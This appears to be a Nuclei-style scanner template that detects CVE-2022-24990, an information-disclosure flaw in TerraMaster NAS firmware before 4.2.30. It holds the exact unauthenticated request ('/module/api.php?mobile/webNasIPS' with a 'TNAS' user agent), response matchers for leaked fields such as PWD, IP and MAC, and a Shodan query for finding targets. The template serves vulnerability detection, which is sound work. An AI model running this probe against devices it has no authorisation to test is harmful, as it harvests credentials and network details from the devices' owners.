id: CVE-2022-24990 info: name: TerraMaster TOS < 4.2.30 Server Information Disclosure author: dwisiswant0 severity: medium description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. reference: - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ metadata: shodan-query: TerraMaster tags: cve,cve2022,terramaster,exposure classification: cve-id: CVE-2022-24990 requests: - method: GET path: - "{{BaseURL}}/module/api.php?mobile/webNasIPS" headers: User-Agent: "TNAS" matchers-condition: and matchers: - type: status status: - 200 - type: word part: header words: - "application/json" - "TerraMaster" condition: and - type: regex part: body regex: - "webNasIPS successful" - "(ADDR|(IFC|PWD|[DS]AT)):" - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick condition: or # Enhanced by mp on 2022/03/23